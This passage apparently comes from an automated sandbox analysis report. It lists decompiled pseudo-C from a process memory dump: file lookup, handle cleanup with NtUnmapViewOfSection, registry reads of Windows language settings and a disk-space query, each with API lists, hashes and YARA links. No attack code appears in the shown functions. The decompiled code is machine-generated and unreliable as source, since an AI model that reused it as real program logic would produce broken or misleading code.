								_t101 = _t97;
								goto L17;
							} else {
								FindClose(_t80);
								if(_v604.cAlternateFileName != 0) {
									if(_a4 != 0) {
										L23:
										_t53 =  &(_v604.cAlternateFileName);
										goto L12;
									} else {
										_t69 =  &(_v604.cAlternateFileName);
										__imp___wcsnicmp(_t69, _t101, _t97 - _t101 >> 1);
										_t108 = _t108 + 0xc;
										if(_t69 != 0) {
											goto L11;
										} else {
											_t71 =  &(_v604.cFileName);
											__imp___wcsicmp(_t71,  &(_v604.cAlternateFileName));
											if(_t71 == 0) {
												goto L11;
											} else {
												goto L23;
											}
										}
									}
									L14:
									_t83 = _t81 - _t91 >> 1;
									_t90 = _t83 - (_t97 - _t101 >> 1);
									_v608 = _t83;
									_t75 = _t75 + _t90;
									if(_t75 >= _v616) {
										goto L21;
									} else {
										if(_t90 > 0) {
											_t84 = _t97;
											_t102 = _t84 + 2;
											do {
												_t58 =  *_t84;
												_t84 = _t84 + 2;
											} while (_t58 != _v624);
											_t103 = _t97 + _t90 * 2;
											memmove(_t103, _t97, 1 + (_t84 - _t102 >> 1) * 2);
											_t83 = _v608;
											_t108 = _t108 + 0xc;
											_t97 = _t103;
										}
										_t104 = _t83 + _t83;
										memcpy(_v632, _v620, _t104);
										_v632 = _v632 + _t104;
										_t108 = _t108 + 0xc;
										_t105 = _v632;
										_t90 = _v616 - (_t105 - _v628 >> 1);
										E00341040(_t105, _v616 - (_t105 - _v628 >> 1), _t97);
										_t47 = _v616;
										_t101 = _t105 + 2;
										_t97 = _t101;
										L17:
										_t77 = _v628;
										_v632 = _t101;
										goto L6;
									}
									goto L8;
								} else {
									L11:
									_t53 =  &(_v604.cFileName);
								}
								L12:
								_t81 = _t53;
								_v620 = _t53;
								_t91 = _t81 + 2;
								do {
									_t54 =  *_t81;
									_t81 = _t81 + 2;
								} while (_t54 != _v624);
								goto L14;
							}
						} else {
							goto L6;
						}
						goto L8;
						L6:
						_t97 = _t97 + 2;
					} while (_t47 != 0);
					_t45 = 1;
				}
				L8:
				_pop(_t96);
				_pop(_t100);
				_pop(_t76);
				return E00346FD0(_t45, _t76, _v8 ^ _t108, _t90, _t96, _t100);
			}

0x0034245c
0x0034245c
0x00342464
0x0034246a
0x00342471
0x0034247a
0x0034247c
0x00342483
0x00342487
0x0034248b
0x0034248e
0x0034248e
0x00342491
0x00342494
0x0034249b
0x0034249f
0x003425d2
0x003425d2
0x003424a5
0x003424a5
0x003424a8
0x003424aa
0x003424ae
0x003424ae
0x003424b1
0x003424b8
0x003424e3
0x003424f2
0x003424f4
0x003424f8
0x003424fe
0x0034d671
0x0034d674
0x00000000
0x00342504
0x00342505
0x00342514
0x003425a6
0x0034d62e
0x0034d62e
0x00000000
0x003425ac
0x003425b3
0x003425bc
0x003425c2
0x003425c7
0x00000000
0x003425cd
0x0034d619
0x0034d61e
0x0034d628
0x00000000
0x00000000
0x00000000
0x00000000
0x0034d628
0x003425c7
0x00342534
0x00342538
0x00342540
0x00342542
0x00342546
0x0034254c
0x00000000
0x00342552
0x00342554
0x0034d63a
0x0034d63c
0x0034d63f
0x0034d63f
0x0034d642
0x0034d645
0x0034d64e
0x0034d65d
0x0034d663
0x0034d667
0x0034d66a
0x0034d66a
0x0034255a
0x00342566
0x0034256b
0x0034256f
0x00342572
0x00342585
0x00342587
0x0034258c
0x00342590
0x00342593
0x00342595
0x00342595
0x00342599
0x00000000
0x00342599
0x00000000
0x0034251a
0x0034251a
0x0034251a
0x0034251a
0x0034251e
0x0034251e
0x00342520
0x00342524
0x00342527
0x00342527
0x0034252a
0x0034252d
0x00000000
0x00342527
0x00000000
0x00000000
0x00000000
0x00000000
0x003424bf
0x003424bf
0x003424c2
0x003424c9
0x003424c9
0x003424ca
0x003424d1
0x003424d2
0x003424d3
0x003424de

APIs

FindFirstFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,00000000,00000000), ref: 003424EC
FindClose.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00342505
memcpy.MSVCRT ref: 00342566
_wcsnicmp.MSVCRT ref: 003425BC
_wcsicmp.MSVCRT ref: 0034D61E

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: Find$CloseFileFirst_wcsicmp_wcsnicmpmemcpy
String ID:
API String ID: 242869866-0
Opcode ID: 95bacd19fda595e05221c78dbddcd43b1affdd1309430733f253de4b33efcd17
Instruction ID: 71c7265f968dbd5de6da5584bf68b9fab31f69274af6dcf0ef6f151217fc92bc
Opcode Fuzzy Hash: 95bacd19fda595e05221c78dbddcd43b1affdd1309430733f253de4b33efcd17
Instruction Fuzzy Hash: 4851C3756043018BC726DF28DC446ABB7E9EFC8310F554A2EF899DB240EB30E945CB96

Uniqueness

Uniqueness Score: -1.00%

Function 03421242, Relevance: 9.0, APIs: 6, Instructions: 31
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E03421242(void* __ebx) {
				void* _t14;
				long _t15;
				void* _t18;
				void* _t19;
				void* _t20;

				_t18 = __ebx;
				_t19 =  *(_t20 - 0x48);
				if(_t19 != 0) {
					NtUnmapViewOfSection(0xffffffff, _t19);
					if( *(_t20 - 0x40) != 0) {
						NtClose( *(_t20 - 0x40));
					}
					_t14 =  *(_t20 - 0x4c);
					if(_t14 != 0) {
						_t14 = NtClose(_t14);
					}
				}
				if( *(_t20 - 0x38) != 0) {
					_t14 = NtClose( *(_t20 - 0x38));
					 *(_t20 - 0x38) = _t18;
				}
				if( *(_t20 - 0x3c) != 0) {
					_t14 = NtClose( *(_t20 - 0x3c));
					 *(_t20 - 0x3c) = _t18;
				}
				if( *(_t20 - 0x34) == 0) {
					return _t14;
				} else {
					_t15 = NtClose( *(_t20 - 0x34));
					 *(_t20 - 0x34) = _t18;
					return _t15;
				}
			}

0x03421242
0x03421242
0x03421247
0x0342124c
0x03421255
0x0342125a
0x0342125a
0x0342125f
0x03421264
0x03421267
0x03421267
0x03421264
0x03421270
0x03421275
0x0342127a
0x0342127a
0x03421281
0x03421286
0x0342128b
0x0342128b
0x03421292
0x0342129f
0x03421294
0x03421297
0x0342129c
0x00000000
0x0342129c

APIs

NtUnmapViewOfSection.0000001A.00000002.476687065.0000000003370000.00000040.00000001.(000000FF,?,0342122C,034707D0,00000058,03420C91,?,00000000,?,00000000,?,?,?,0344B56B,00000000,?), ref: 0342124C
NtClose.0000001A.00000002.476687065.0000000003370000.00000040.00000001.(?,0342122C,034707D0,00000058,03420C91,?,00000000,?,00000000,?,?,?,0344B56B,00000000,?,00000000), ref: 0342125A

Part of subcall function 033D95D0: LdrInitializeThunk.0000001A.00000002.476687065.0000000003370000.00000040.00000001. ref: 033D95DA

NtClose.0000001A.00000002.476687065.0000000003370000.00000040.00000001.(?,0342122C,034707D0,00000058,03420C91,?,00000000,?,00000000,?,?,?,0344B56B,00000000,?,00000000), ref: 03421267
NtClose.0000001A.00000002.476687065.0000000003370000.00000040.00000001.(?,0342122C,034707D0,00000058,03420C91,?,00000000,?,00000000,?,?,?,0344B56B,00000000,?,00000000), ref: 03421275
NtClose.0000001A.00000002.476687065.0000000003370000.00000040.00000001.(?,0342122C,034707D0,00000058,03420C91,?,00000000,?,00000000,?,?,?,0344B56B,00000000,?,00000000), ref: 03421286
NtClose.0000001A.00000002.476687065.0000000003370000.00000040.00000001.(?,0342122C,034707D0,00000058,03420C91,?,00000000,?,00000000,?,?,?,0344B56B,00000000,?,00000000), ref: 03421297

Memory Dump Source

Source File: 0000001A.00000002.476687065.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: true

Associated: 0000001A.00000002.478748328.000000000348B000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.478791724.000000000348F000.00000040.00000001.sdmp Download File

Similarity

API ID: A.00000002.476687065.0000000003370000.00000040.00000001$Close.0000001$InitializeSection.0000001Thunk.0000001UnmapView
String ID:
API String ID: 1866612829-0
Opcode ID: df9b40cab72dcffc0bbba800b8aff6860ab2831aacd6ae3e33e08911f29cf166
Instruction ID: 581aedb83ec1f647c4149bc44f6831502797c0b5fcb7b0622e79dd0405b4d5ad
Opcode Fuzzy Hash: df9b40cab72dcffc0bbba800b8aff6860ab2831aacd6ae3e33e08911f29cf166
Instruction Fuzzy Hash: 54F0BD75D0121CEADF19EFB4E8C479EFF72AF10215F581229F011792A0DB714891DB54

Uniqueness

Uniqueness Score: -1.00%

Function 0339DCA4, Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 242
nativeCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E0339DCA4(signed int* __ecx) {
				intOrPtr _v8;
				signed int _v16;
				char _v540;
				unsigned int _v544;
				char _v556;
				signed int _v560;
				signed int _v564;
				signed char _v568;
				char _v572;
				signed int _v576;
				char _v584;
				signed int _v588;
				signed int _v592;
				intOrPtr _v596;
				char* _v600;
				signed int _v604;
				char _v608;
				char _v612;
				char _v616;
				char _v620;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t80;
				signed int _t84;
				signed int _t86;
				signed int _t94;
				char _t111;
				signed char _t124;
				signed int _t133;
				unsigned int _t141;
				signed int _t145;
				signed char _t146;
				signed int _t152;
				signed int _t155;
				void* _t156;
				signed int _t157;
				signed int* _t159;
				void* _t160;
				signed int _t163;
				signed int _t165;

				_t137 = __ecx;
				_t136 = _t165;
				_push(__ecx);
				_push(__ecx);
				_v8 =  *((intOrPtr*)(_t165 + 4));
				_t163 = (_t165 & 0xffffffe0) + 4;
				_v16 =  *0x348d360 ^ _t163;
				_t159 = __ecx;
				_v564 = 0;
				_t155 = 0;
				_v560 = 0;
				_v612 = 0;
				_v568 = 0;
				_v572 = 0xffffffff;
				if(__ecx == 0) {
					_t80 = 0xc000000d;
					L30:
					_pop(_t156);
					_pop(_t160);
					return E033DB640(_t80, _t136, _v16 ^ _t163, _t149, _t156, _t160);
				}
				if(E033DA4C0() < 0) {
					L6:
					L0339E8B0(_t137, _t159, 0x3ff);
					_t84 = E0339DBB1(_t137);
					_t159[5] = _t84;
					if(_t84 == 0) {
						_t155 = 0xc0000017;
						L33:
						L0339E8B0(_t137, _t159, 0x3ff);
						L29:
						_t80 = _t155;
						goto L30;
					}
					 *_t159 =  *_t159 | 0x00000001;
					_t86 = E0339DBF1(_t137, _t149);
					_t159[6] = _t86;
					if(_t86 == 0) {
						goto L33;
					}
					 *_t159 =  *_t159 | 0x00000002;
					E033DBB40(_t137,  &_v584, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\MUI\\UILanguages");
					_v608 = 0x18;
					_v600 =  &_v584;
					_t157 = 0;
					_v564 = 0;
					_push( &_v608);
					_push(0x20019);
					_v604 = 0;
					_push( &_v564);
					_v596 = 0x40;
					_v592 = 0;
					_v588 = 0;
					if(E033D9600() < 0) {
						L28:
						_t137 = _t159;
						_t155 = L0339E009(_t159);
						if(_t155 < 0) {
							goto L33;
						}
						goto L29;
					}
					_t94 = 0;
					_v576 = 0;
					while(1) {
						_push( &_v612);
						_push(0x200);
						_t137 =  &_v556;
						_push( &_v556);
						_push(_t157);
						_push(_t94);
						_push(_v564);
						_t155 = E033D9820();
						if(_t155 < 0) {
							goto L32;
						}
						_t141 = _v544;
						if(_t141 + 0x18 > 0x200) {
							L23:
							if(_v560 != 0) {
								NtClose(_v560);
								_v560 = _v560 & 0x00000000;
							}
							_t94 = _v576 + 1;
							_v576 = _t94;
							if(_t155 != 0x8000001a) {
								_t157 = 0;
								continue;
							} else {
								if(_v564 != 0) {
									NtClose(_v564);
									_v564 = _v564 & 0x00000000;
								}
								goto L28;
							}
						}
						 *((short*)(_t163 + (_t141 >> 1) * 2 - 0x210)) = 0;
						E033DBB40(_t141 >> 1,  &_v584,  &_v540);
						_v604 = _v564;
						_v600 =  &_v584;
						_push( &_v608);
						_push(0x20019);
						_v560 = 0;
						_push( &_v560);
						_v608 = 0x18;
						_v596 = 0x40;
						_v592 = 0;
						_v588 = 0;
						if(E033D9600() < 0) {
							goto L23;
						}
						E033DBB40(0,  &_v584, L"Type");
						_t111 = 4;
						_v620 = _t111;
						_t149 =  &_v584;
						_v616 = _t111;
						_push(0);
						if(L0339F018(_v560,  &_v584,  &_v620,  &_v568,  &_v616) < 0) {
							goto L23;
						}
						_t145 = _v568;
						if(E0339DC63(_t145) < 0) {
							goto L23;
						}
						_t146 = _t145 & 0x0000419f;
						_v568 = _t146;
						_t149 = _t146 & 0x00000007;
						if(_t149 != 0 && ( ~_t149 & _t149) == _t149) {
							_t152 = _t146 & 0x00000180;
							if(_t152 == 0 || ( ~_t152 & _t152) != _t152) {
								_t146 = _t146 & 0xfffffeff | 0x00000080;
								_v568 = _t146;
							}
							_t149 = _t146 & 0x00000018;
							if(_t149 != 0 && ( ~_t149 & _t149) == _t149) {
								_t124 = _t146;
								if((_t124 & 0x00000008) != 0) {
									if((_t124 & 0x00000004) == 0) {
										goto L23;
									}
								}
								_t149 = _v560;
								E0339E375(_t159, _v560,  &_v540, _t146, _t146,  &_v572);
							}
						}
						goto L23;
						L32:
						if(_t155 == 0x8000001a) {
							goto L23;
						}
						goto L33;
					}
				}
				_push( &(__ecx[1]));
				_t155 = E033DA980();
				if(_t155 < 0) {
					goto L33;
				}
				_t133 = __ecx[1] & 0x0000ffff;
				_t137 = 0x1000;
				if(_t133 == 0x1000) {
					goto L33;
				}
				_t137 = 0x1400;
				if(_t133 == 0x1400) {
					goto L33;
				}
				_t137 = __ecx;
				_t149 =  &(__ecx[1]);
				E0339E620(__ecx, _t149,  &(__ecx[2]));
				goto L6;
			}

0x0339dca4
0x0339dca7
0x0339dca9
0x0339dcaa
0x0339dcb5
0x0339dcb9
0x0339dcc8
0x0339dccf
0x0339dcd1
0x0339dcd7
0x0339dcd9
0x0339dcdf
0x0339dce5
0x0339dcee
0x0339dcf7
0x033f4fbf
0x0339dfd8
0x0339dfdb
0x0339dfde
0x0339dfea
0x0339dfea
0x0339dd04
0x0339dd47
0x0339dd4d
0x0339dd52
0x0339dd57
0x0339dd5c
0x033f4fc9
0x0339dffc
0x0339e002
0x0339dfd6
0x0339dfd6
0x00000000
0x0339dfd6
0x0339dd62
0x0339dd6a
0x0339dd6f
0x0339dd74
0x00000000
0x00000000
0x0339dd7a
0x0339dd89
0x0339dd94
0x0339dd9e
0x0339dda4
0x0339ddac
0x0339ddb2
0x0339ddb3
0x0339ddbe
0x0339ddc4
0x0339ddc5
0x0339ddcf
0x0339ddd5
0x0339dde2
0x0339dfc9
0x0339dfc9
0x0339dfd0
0x0339dfd4
0x00000000
0x00000000
0x00000000
0x0339dfd4
0x0339dde8
0x0339ddea
0x0339ddf0
0x0339ddf6
0x0339ddf7
0x0339ddfc
0x0339de02
0x0339de03
0x0339de04
0x0339de05
0x0339de10
0x0339de14
0x00000000
0x00000000
0x0339de1a
0x0339de28
0x0339df7e
0x0339df85
0x0339df8d
0x0339df92
0x0339df92
0x0339df9f
0x0339dfa0
0x0339dfac
0x0339dfed
0x00000000
0x0339dfae
0x0339dfb5
0x0339dfbd
0x0339dfc2
0x0339dfc2
0x00000000
0x0339dfb5
0x0339dfac
0x0339de32
0x0339de48
0x0339de55
0x0339de61
0x0339de6d
0x0339de6e
0x0339de79
0x0339de7f
0x0339de80
0x0339de8a
0x0339de94
0x0339de9a
0x0339dea7
0x00000000
0x00000000
0x0339deb9
0x0339dec0
0x0339dec1
0x0339dec7
0x0339decd
0x0339ded9
0x0339def6
0x00000000
0x00000000
0x0339defc
0x0339df09
0x00000000
0x00000000
0x0339df0b
0x0339df13
0x0339df19
0x0339df1c
0x0339df2a
0x0339df30
0x033f4fd9
0x033f4fdf
0x033f4fdf
0x0339df48
0x0339df4b
0x0339df57
0x0339df5b
0x033f4fec
0x00000000
0x00000000
0x033f4ff2
0x0339df61
0x0339df79
0x0339df79
0x0339df4b
0x00000000
0x0339dff4
0x0339dffa
0x00000000
0x00000000
0x00000000
0x0339dffa
0x0339ddf0
0x0339dd09
0x0339dd0f
0x0339dd13
0x00000000
0x00000000
0x0339dd19
0x0339dd1d
0x0339dd25
0x00000000
0x00000000
0x0339dd2b
0x0339dd33
0x00000000
0x00000000
0x0339dd3c
0x0339dd3f
0x0339dd42
0x00000000

APIs

NtEnumerateKey.0000001A.00000002.476687065.0000000003370000.00000040.00000001.(?,00000000,00000000,?,00000200,?,?,00020019,00000018,?,\Registry\Machine\System\CurrentControlSet\Control\MUI\UILanguages,?,000003FF,034866C0,?), ref: 0339DE0B

Part of subcall function 0339E620: NtClose.0000001A.00000002.476687065.0000000003370000.00000040.00000001.(00000000,?,?,?,?,00020019,00000018), ref: 0339E720

NtClose.0000001A.00000002.476687065.0000000003370000.00000040.00000001.(00000000,?,?,?,?,?,?,?,?,?,Type,00000000,00020019,00000018,?,?), ref: 0339DF8D
NtClose.0000001A.00000002.476687065.0000000003370000.00000040.00000001.(00000000,?,?,?,?,?,?,?,?,?,Type,00000000,00020019,00000018,?,?), ref: 0339DFBD

Strings

\Registry\Machine\System\CurrentControlSet\Control\MUI\UILanguages, xrefs: 0339DD83
Type, xrefs: 0339DEAD

Memory Dump Source

Source File: 0000001A.00000002.476687065.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: true

Associated: 0000001A.00000002.478748328.000000000348B000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.478791724.000000000348F000.00000040.00000001.sdmp Download File

Similarity

API ID: A.00000002.476687065.0000000003370000.00000040.00000001$Close.0000001$EnumerateKey.0000001
String ID: Type$\Registry\Machine\System\CurrentControlSet\Control\MUI\UILanguages
API String ID: 2886250587-1779307477
Opcode ID: 73ac53c6fca32a8e1b72437590df118cd4aaf5206b0d877a760105c1d8135e32
Instruction ID: 6a8644f5029a57fc4e8755d4b8c74d42a3511def09e3334be775f1aafac6aed4
Opcode Fuzzy Hash: 73ac53c6fca32a8e1b72437590df118cd4aaf5206b0d877a760105c1d8135e32
Instruction Fuzzy Hash: 0E919271D0121A9BEF24DB68DCDA7EAF7B9AB44310F1442EBD509E7250EB349A80CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0339E620, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 165
nativeCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E0339E620(void* __ecx, short* __edx, short* _a4) {
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char* _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E0339F358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							NtClose(_v56);
						}
						if(_t78 != 0) {
							L033B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E033DFA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E033DBB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E033D9600();
					if(_t97 < 0) {
						goto L6;
					}
					E033DBB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L0339F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E033DBB40(_t83, _t102 + 0x24, _t78);
								if(L033A43C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E033DBB40(_t84, _t102 + 0x24, _t94);
									if(L033A43C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}

0x0339e620
0x0339e628
0x0339e62f
0x0339e631
0x0339e635
0x0339e637
0x0339e63e
0x033f5503
0x033f5503
0x0339e64c
0x0339e64c
0x0339e651
0x00000000
0x00000000
0x0339e661
0x0339e665
0x033f542a
0x0339e715
0x0339e71a
0x0339e720
0x0339e720
0x0339e727
0x0339e736
0x0339e736
0x0339e743
0x0339e743
0x0339e673
0x0339e678
0x0339e67d
0x0339e682
0x0339e685
0x0339e692
0x0339e69b
0x0339e6a3
0x0339e6ad
0x0339e6b1
0x0339e6b2
0x0339e6bb
0x0339e6bf
0x0339e6c0
0x0339e6c8
0x0339e6cc
0x0339e6d5
0x0339e6d9
0x00000000
0x00000000
0x0339e6e5
0x0339e6ea
0x0339e6f9
0x0339e70b
0x0339e70f
0x033f5439
0x033f545e
0x033f545e
0x00000000
0x033f545e
0x033f543b
0x033f543e
0x033f5440
0x033f5445
0x033f5472
0x033f5475
0x033f548d
0x033f5493
0x033f54a9
0x00000000
0x00000000
0x033f54ab
0x033f54b4
0x033f54bc
0x033f54c8
0x033f54de
0x033f54fb
0x033f54e0
0x033f54e6
0x033f54eb
0x033f54eb
0x033f54de
0x00000000
0x033f54bc
0x033f5477
0x033f547a
0x033f5480
0x033f5483
0x033f5486
0x033f548b
0x00000000
0x00000000
0x00000000
0x033f548b
0x00000000
0x00000000
0x00000000
0x00000000
0x033f5447
0x033f5447
0x033f5447
0x033f5447
0x033f544e
0x00000000
0x00000000
0x033f5450
0x033f5452
0x033f5455
0x033f545a
0x00000000
0x00000000
0x00000000
0x033f545c
0x033f546a
0x033f546d
0x033f546f
0x00000000
0x033f546f
0x0339e70f

APIs

NtClose.0000001A.00000002.476687065.0000000003370000.00000040.00000001.(00000000,?,?,?,?,00020019,00000018), ref: 0339E720

Strings

InstallLanguageFallback, xrefs: 0339E6DB
@, xrefs: 0339E6C0
\Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 0339E68C

Memory Dump Source

Source File: 0000001A.00000002.476687065.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: true

Associated: 0000001A.00000002.478748328.000000000348B000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.478791724.000000000348F000.00000040.00000001.sdmp Download File

Similarity

API ID: A.00000002.476687065.0000000003370000.00000040.00000001Close.0000001
String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
API String ID: 971714608-1757540487
Opcode ID: 3b3dd2d1c614bb7e289bf2ac301f3ab28861b66c9a915df051640ba1c7186368
Instruction ID: 84235d1eb0f126a02510ae40d5b82aab98e2574c3676f670a15c114c2be851bd
Opcode Fuzzy Hash: 3b3dd2d1c614bb7e289bf2ac301f3ab28861b66c9a915df051640ba1c7186368
Instruction Fuzzy Hash: C851B1769043459FEB10DF25C8C0A6BB3E8BF89615F49096EF985DB240F734D944C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 0035A0D2, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0035A118

Part of subcall function 00340C70: ??_V@YAXPAX@Z.MSVCRT ref: 00340CBA
Part of subcall function 00340C70: memset.MSVCRT ref: 00340CDD

GetDiskFreeSpaceExW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,?,-00000105,?,?,?), ref: 0035A1B5
??_V@YAXPAX@Z.MSVCRT ref: 0035A225

Strings

%5lu, xrefs: 0035A1FE

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: memset$DiskFreeSpace
String ID: %5lu
API String ID: 2448137811-2100233843
Opcode ID: ce80b7f248b46060c1e2ec8cb36083e0543cb087e6045adfb381a43e4bf461cc
Instruction ID: 24f7db04349e3048f1dc8cbe13212a08a99f803eb54283bfc1cd15bc0c7feee1
Opcode Fuzzy Hash: ce80b7f248b46060c1e2ec8cb36083e0543cb087e6045adfb381a43e4bf461cc
Instruction Fuzzy Hash: 6041B771E00619ABDB26DBA4DCC5EEEB7B8FF08304F004199E905AB151E7749F89CB91

Uniqueness

Uniqueness Score: -1.00%

Function 033A3D34, Relevance: 6.7, Strings: 5, Instructions: 435
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E033A3D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E033A1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L033B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E033A1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L033B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E033A1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E033A1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E033A1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L033B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L033B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L033B4620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E033DF3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E033E1370(_t276, 0x3374e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E033DBB40(0,  &_v68, _t170);
									if(L033A43C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
